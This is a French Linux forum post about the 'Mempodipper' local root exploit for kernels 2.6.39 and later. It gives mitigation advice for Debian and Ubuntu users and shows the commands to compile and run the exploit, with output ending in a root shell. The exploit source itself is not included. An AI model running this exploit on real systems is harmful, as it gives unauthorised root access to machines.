coyotus
#!gourou linux
Online
Joined: 20 Feb 2009
Posts: 1,576
Localisation: Belgique   OS: Crunchbang
|
 Posted: Fri 27 Jan - 14:10 Post subject: Linux local root exploit via SUID |
 |
|
Encore une fois un exploit qui n'est applicable que pour les personnes trop pressée d'avoir toujours la version la plus récente de tout.
suite à la lecture de cet article sur tuxplanet http://www.tux-planet.fr/linux-local-root-exploit-via-suid/
Je ne peux qu'exprimer ma non surprise en voyant le kernel impliqué.
| Quote: | | Celle-ci affecte les noyaux Linux dont la version est égale ou supérieure à la 2.6.39. |
==Précaution à prendre==
Sous debian, réfléchissez bien avant de passer en testing, n'oubliez pas qu'il y a possibilité d'utiliser le pinning qui permet de privilégier certains paquets plus récent sans changer de version.
Sous Ubuntu, privilégiez les version dite LTS plus éprouvée que les intermédiaires.
Pour les autres, rassurez vous une faille aussi vite découverte et publiée sera vite comblée.
==L'exploit==
Pour ceux qui veulent tester, l'exploit est téléchargeable ici
==Utilisation==
| Code: | $ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root |
____________________________
|
|
Back to top